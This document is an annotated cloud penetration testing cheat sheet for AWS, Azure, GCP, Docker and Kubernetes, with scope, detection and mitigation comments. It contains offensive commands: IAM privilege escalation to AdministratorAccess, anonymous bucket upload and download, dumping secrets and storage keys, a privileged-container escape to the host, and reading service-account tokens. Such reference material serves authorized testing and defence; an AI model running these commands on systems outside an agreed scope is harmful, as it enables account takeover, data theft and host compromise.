CLOUD PENETRATION TESTING
⚠️ LEGAL WARNING: Only test cloud resources you own or have explicit authorization to test.
☁️ AWS PENETRATION TESTING
AWS CLI Setup & Enumeration
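# Install AWS CLI
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
# The installer runs as root, so check the archive before unpacking it.
# AWS publishes a detached PGP signature beside the zip; the matching public
# key is printed in the official AWS CLI install guide. Save that key locally
# (aws-cli-public-key.asc is a placeholder file name) and import it first.
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip.sig" -o "awscliv2.sig"
gpg --import aws-cli-public-key.asc
# Unpack and install only if the signature verifies.
gpg --verify awscliv2.sig awscliv2.zip &&
  unzip awscliv2.zip &&
  sudo ./aws/install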
# Configure credentials
# `aws configure` prompts interactively; the two "AWS ... Key" lines below are
# its prompts with placeholder answers, not commands to run.
# The answers are stored in plain text under ~/.aws/credentials, so use keys
# issued for this engagement and remove them from the file when it ends.
# Before enumerating, `aws sts get-caller-identity` shows which account and
# principal the CLI is really using - confirm it matches the agreed scope.
aws configure
AWS Access Key ID: YOUR_ACCESS_KEY
AWS Secret Access Key: YOUR_SECRET_KEY
# Identity & Access Management (IAM) Enumeration
# Read-only calls. Where CloudTrail records read management events, a burst
# of List*/Get* calls from one principal is a usable detection signal.
aws iam get-user
aws iam list-users
aws iam list-roles
aws iam list-policies
# Returns users, groups, roles and their policy documents in one response;
# keep the output with the engagement's confidential data.
aws iam get-account-authorization-details
# EC2 Enumeration
# Things to review in the output: security-group ingress open to 0.0.0.0/0,
# unencrypted volumes, and snapshots shared outside the account.
aws ec2 describe-instances
aws ec2 describe-security-groups
# --owner-ids self limits the result to snapshots owned by the calling account.
aws ec2 describe-snapshots --owner-ids self
aws ec2 describe-volumes
# S3 Bucket Enumeration
# Without --no-sign-request the CLI signs with the configured credentials and
# shows what that principal can see. With --no-sign-request the request is
# sent unsigned, so a successful listing means anonymous access is allowed.
aws s3 ls
aws s3 ls s3://bucket-name --no-sign-request
aws s3api list-buckets
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name
# Download from public S3
# sync copies the whole bucket into the current directory. A listing is
# normally enough to evidence the finding; agree with the client beforehand
# whether copying content (which may include personal data) is in scope.
aws s3 sync s3://bucket-name . --no-sign-request
# Lambda Functions
# get-function returns the function configuration, including environment
# variables - a common place to find hard-coded secrets worth reporting.
aws lambda list-functions
aws lambda get-function --function-name function-name
# RDS (Database) Enumeration
# Review PubliclyAccessible and StorageEncrypted in the instance output.
aws rds describe-db-instances
aws rds describe-db-snapshots
# CloudTrail (Logging)
# Audit check: is a trail logging (IsLogging), multi-region, and is log file
# validation enabled? Gaps here limit detection of everything else on this page.
aws cloudtrail describe-trails
aws cloudtrail get-trail-status --name trail-name
# Secrets Manager
# get-secret-value prints the secret in plain text to the terminal and is
# recorded by CloudTrail as GetSecretValue. Keep the value out of reports
# and shell history; report the access path, not the secret.
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id secret-name
S3 Bucket Exploitation
# Test for public access
# Unsigned request: if this lists objects, the bucket is readable anonymously.
# Remediation is S3 Block Public Access at the account and bucket level.
aws s3 ls s3://bucket-name --no-sign-request
# Upload to writable bucket
# A successful unsigned upload evidences anonymous write. The marker object
# stays in the client's bucket until deleted - record its key and remove it.
# Note that the echo overwrites any existing ./test.txt.
echo "test" > test.txt
aws s3 cp test.txt s3://bucket-name/ --no-sign-request
# S3Scanner
# NOTE(review): the invocation depends on the S3Scanner release in use -
# confirm against its README. buckets.txt is presumably one candidate bucket
# name per line.
python3 s3scanner.py --bucket-file buckets.txt
# Gray Hat Warfare (Public S3 search)
# Visit: buckets.grayhatwarfare.com
# Common bucket naming patterns
# The names below are examples, not commands; "company" stands for the
# organisation's name. Bucket names are guessable and are not a secret, so
# the bucket policy and Block Public Access have to be the control.
company-backups
company-data
company-logs
company-dev
company-prod
AWS Privilege Escalation
# Create new IAM user
# NOTE(review): every call in this section succeeds only if the current
# principal already holds the matching IAM permission (iam:CreateUser,
# iam:CreateAccessKey, iam:AttachUserPolicy, iam:CreateRole, iam:PassRole).
# A success is the finding: that principal can grant itself administrator
# access. Defenders can alert on the corresponding CloudTrail events:
# CreateUser, CreateAccessKey, AttachUserPolicy, CreateRole, RunInstances.
# Whatever is created here is a live credential or role in the client's
# account - log it and delete it before the engagement closes.
aws iam create-user --user-name hacker
aws iam create-access-key --user-name hacker
# Attach admin policy
# Mitigation: permission boundaries or service control policies that deny
# attaching AdministratorAccess outside a designated break-glass role.
aws iam attach-user-policy --user-name hacker --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# Create IAM role
# trust-policy.json is not shown on this page; its contents decide which
# principals may assume the role.
aws iam create-role --role-name HackerRole --assume-role-policy-document file://trust-policy.json
# Pass role to EC2
# Abbreviated: the other arguments run-instances requires are omitted here.
# Mitigation: scope iam:PassRole to specific role ARNs rather than "*".
aws ec2 run-instances --iam-instance-profile Name=AdminProfile
AWS Pentesting Tools
# Pacu - AWS Exploitation Framework
# NOTE(review): this clones the default branch and installs unpinned
# dependencies into the active Python environment. The tool then runs with
# the AWS credentials you hand it, so check out a tagged release, install
# into a virtualenv, and confirm the steps against the project's README.
git clone https://github.com/RhinoSecurityLabs/pacu.git
cd pacu
pip3 install -r requirements.txt
python3 pacu.py
# ScoutSuite - Multi-cloud security auditing
# The report it writes describes the whole account's configuration; store it
# with the engagement's confidential data. Prefer a virtualenv for the install.
pip install scoutsuite
scout aws
# Prowler - AWS Security Assessment
# NOTE(review): `./prowler` matches the older script-based releases; newer
# releases may be installed and invoked differently - check the README.
git clone https://github.com/prowler-cloud/prowler
cd prowler
./prowler
# CloudMapper - AWS Visualization
# collect pulls account metadata to local files; prepare builds the graph data.
# NOTE(review): confirm which address `webserver` binds to before running it
# on a shared or internet-reachable host - it serves the collected data.
python cloudmapper.py collect --account my-account
python cloudmapper.py prepare --account my-account
python cloudmapper.py webserver
☁️ AZURE PENETRATION TESTING
Azure CLI & Enumeration
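# Install Azure CLI
# Download the installer to a file instead of piping it straight into a root
# shell: -f stops an HTTP error page from being saved as the script, a
# truncated transfer cannot be half-executed, and the script can be read
# before it runs with sudo.
curl -fsSL https://aka.ms/InstallAzureCLIDeb -o InstallAzureCLIDeb.sh
less InstallAzureCLIDeb.sh
sudo bash InstallAzureCLIDeb.sh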
# Login
# The resulting tokens are cached on disk under ~/.azure; run `az logout` and
# clear that cache on shared test hosts when the engagement ends.
az login
# Account Information
# Confirm the tenant and subscription shown here match the agreed scope
# before running anything else.
az account list
az account show
# Active Directory Enumeration
# Directory reads; --all removes the default result cap and can return a
# very large list in big tenants.
az ad user list
az ad group list
az ad sp list --all
# Virtual Machines
az vm list
az vm list-ip-addresses
az vm show --name vm-name --resource-group rg-name
# Storage Accounts
# `keys list` returns the account access keys, which grant full data-plane
# access to the storage account. The call appears in the Activity Log as a
# listKeys operation - a good alerting point for defenders.
az storage account list
az storage account keys list --account-name storage-name
az storage container list --account-name storage-name
# Key Vault
# `secret show` prints the secret value to the terminal. With Key Vault
# diagnostic logging enabled the read is recorded (SecretGet); report the
# access path rather than copying the value into notes.
az keyvault list
az keyvault secret list --vault-name vault-name
az keyvault secret show --vault-name vault-name --name secret-name
# Web Apps
az webapp list
az webapp config show --name app-name --resource-group rg-name
Azure AD Attacks
# AADInternals (PowerShell)
# Install-Module pulls the module from the configured PowerShell repository;
# install on a dedicated test workstation and note the module version used.
Install-Module AADInternals
Import-Module AADInternals
# Get tenant information
# NOTE(review): presumably this queries public sign-in endpoints and needs no
# credentials - confirm against the module documentation.
Get-AADIntLoginInformation -UserName user@domain.com
# Get access token
# The ClientID below is a fixed, publicly documented application ID (commonly
# listed as a Microsoft first-party client), not a secret. Sign-ins made with
# it show that application ID in the tenant's sign-in logs, which gives
# defenders something concrete to filter on.
Get-AADIntAccessToken -ClientID "d3590ed6-52b3-4102-aeff-aad2292ab01c" -Resource "https://graph.microsoft.com"
# MicroBurst
# "company" is a placeholder base name for the organisation being assessed.
Import-Module MicroBurst.psm1
Get-AzureDomainInfo -Verbose
Invoke-EnumerateAzureBlobs -Base company
# ROADtools
# auth obtains tokens, gather dumps directory data to a local database file,
# gui serves it for browsing. The database holds a full copy of the directory
# objects the account can read - store and dispose of it as confidential data.
roadrecon auth
roadrecon gather
roadrecon gui
Azure Storage Attacks
# MicroBurst blob enumeration
# Same command as in the Azure AD section; "company" is a placeholder.
Invoke-EnumerateAzureBlobs -Base company
# Azure Storage Explorer
# Download: https://azure.microsoft.com/en-us/features/storage-explorer/
# Access public blobs
# The line below is a URL pattern, not a command. It resolves without
# credentials only when the container's public access level allows it.
# Mitigation: disable anonymous blob access at the storage-account level and
# hand out time-limited SAS tokens or identity-based access instead.
https://storage-account.blob.core.windows.net/container/file.txt
☁️ GOOGLE CLOUD PLATFORM (GCP)
GCloud CLI & Enumeration
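# Install gcloud
# Save the installer to a file rather than piping the response into bash:
# -f rejects HTTP error pages, a truncated transfer cannot be half-executed,
# and the script can be read before it runs.
curl -fsSL https://sdk.cloud.google.com -o install_gcloud.sh
less install_gcloud.sh
bash install_gcloud.sh
# Restart the login shell so the updated PATH is picked up; quoted so a shell
# path containing spaces is not word-split.
exec -l "$SHELL"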
# Authentication
# `auth list` shows every credentialed account and marks the active one -
# confirm the active account is the one issued for this engagement.
gcloud auth login
gcloud auth list
# Project Enumeration
# `config set project` changes the default project for every later command
# in this section; double-check it is an in-scope project.
gcloud projects list
gcloud config set project project-id
# Compute Instances
gcloud compute instances list
gcloud compute instances describe instance-name
gcloud compute disks list
gcloud compute images list
# Storage Buckets
# gsutil uses the active gcloud credentials, so these results show what that
# account can reach, not what is public.
gsutil ls
gsutil ls -r gs://bucket-name
gsutil cp gs://bucket-name/file .
# IAM
# In the policy output, review bindings for allUsers / allAuthenticatedUsers
# and for broad roles (Owner, Editor) granted to service accounts.
# User-managed service-account keys are long-lived; old keys in the `keys
# list` output are a finding in their own right.
gcloud projects get-iam-policy project-id
gcloud iam service-accounts list
gcloud iam service-accounts keys list --iam-account=sa@project.iam.gserviceaccount.com
# Cloud Functions
gcloud functions list
gcloud functions describe function-name
# Cloud SQL
gcloud sql instances list
gcloud sql databases list --instance=instance-name
GCP Bucket Enumeration
# GCPBucketBrute
# NOTE(review): flags depend on the tool version - confirm against its README.
# keywords.txt is presumably a list of base names to permute.
python3 gcpbucketbrute.py -k keywords.txt
# Test public access
# gsutil signs with the active credentials when any are configured, so a
# successful `gsutil ls` does not by itself show anonymous access. The curl
# request carries no credentials and is the one that evidences public read.
# Mitigation: enforce public access prevention and uniform bucket-level access.
gsutil ls gs://bucket-name
curl https://storage.googleapis.com/bucket-name/file.txt
# Common naming patterns
# Example names, not commands; "company" stands for the organisation's name.
company-backup
company-staging
company-prod
company_assets
🐳 DOCKER & KUBERNETES SECURITY
Docker Security Testing
# Enumerate containers
# All docker commands talk to the daemon; an account that can run them
# (for example a member of the docker group) is effectively root on the host.
docker ps
docker ps -a
docker images
# Docker escape (privileged container)
# --privileged drops the container's isolation and --pid=host exposes the
# host's process table, so nsenter can join the namespaces of host PID 1.
# This illustrates why both flags should be denied by policy for ordinary
# workloads; rootless mode and user namespaces reduce the impact.
docker run --rm -it --privileged --pid=host alpine nsenter -t 1 -m -u -i sh
# Mount host filesystem
# The bind mount exposes the host's root filesystem inside the container.
# The cd below is typed in the container's shell, not on the host.
docker run -v /:/hostOS -it alpine
cd /hostOS
# Docker socket exposure
# A process that can reach docker.sock controls the daemon. A JSON container
# list in the response confirms the socket is usable from this context;
# avoid mounting the socket into containers.
curl --unix-socket /var/run/docker.sock http://localhost/containers/json
# Dive - Analyze Docker images
# Inspects an image layer by layer; useful for spotting secrets or keys that
# were added in one layer and "deleted" in a later one.
dive image-name
Kubernetes Security
# kubectl commands
# What these return depends on the RBAC bound to the current kubeconfig
# identity. Secret values are base64-encoded, not encrypted, in API output;
# a principal that can list secrets cluster-wide is itself a finding.
kubectl cluster-info
kubectl get nodes
kubectl get pods --all-namespaces
kubectl get secrets --all-namespaces
kubectl get configmaps --all-namespaces
# Execute in pod
# Requires RBAC access to the pods/exec subresource. With API server audit
# logging enabled, exec sessions are recorded and can be alerted on.
kubectl exec -it pod-name -- /bin/bash
# kube-hunter (vulnerability scanner)
# Active network scan of the given address; cluster-ip is a placeholder.
kube-hunter --remote cluster-ip
# kube-bench (CIS benchmark)
# Configuration audit against the CIS Kubernetes benchmark; run it on the
# node (or as a job in the cluster) being assessed.
kube-bench
# Privilege escalation via ServiceAccount
# Run from inside a pod: this is the token Kubernetes mounts for the pod's
# service account. Its impact equals the RBAC granted to that account.
# Mitigation: set automountServiceAccountToken: false where the workload does
# not call the API, and bind service accounts to least-privilege roles.
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Peirates (K8s pentesting tool)
./peirates
💡 Cloud Security Best Practices
- Always get authorization before testing cloud resources
- Use dedicated test accounts/projects
- Enable MFA on all accounts
- Follow principle of least privilege
- Monitor CloudTrail/Activity Logs for anomalies
- Encrypt data at rest and in transit
- Regularly rotate credentials
- Use infrastructure as code (Terraform, CloudFormation)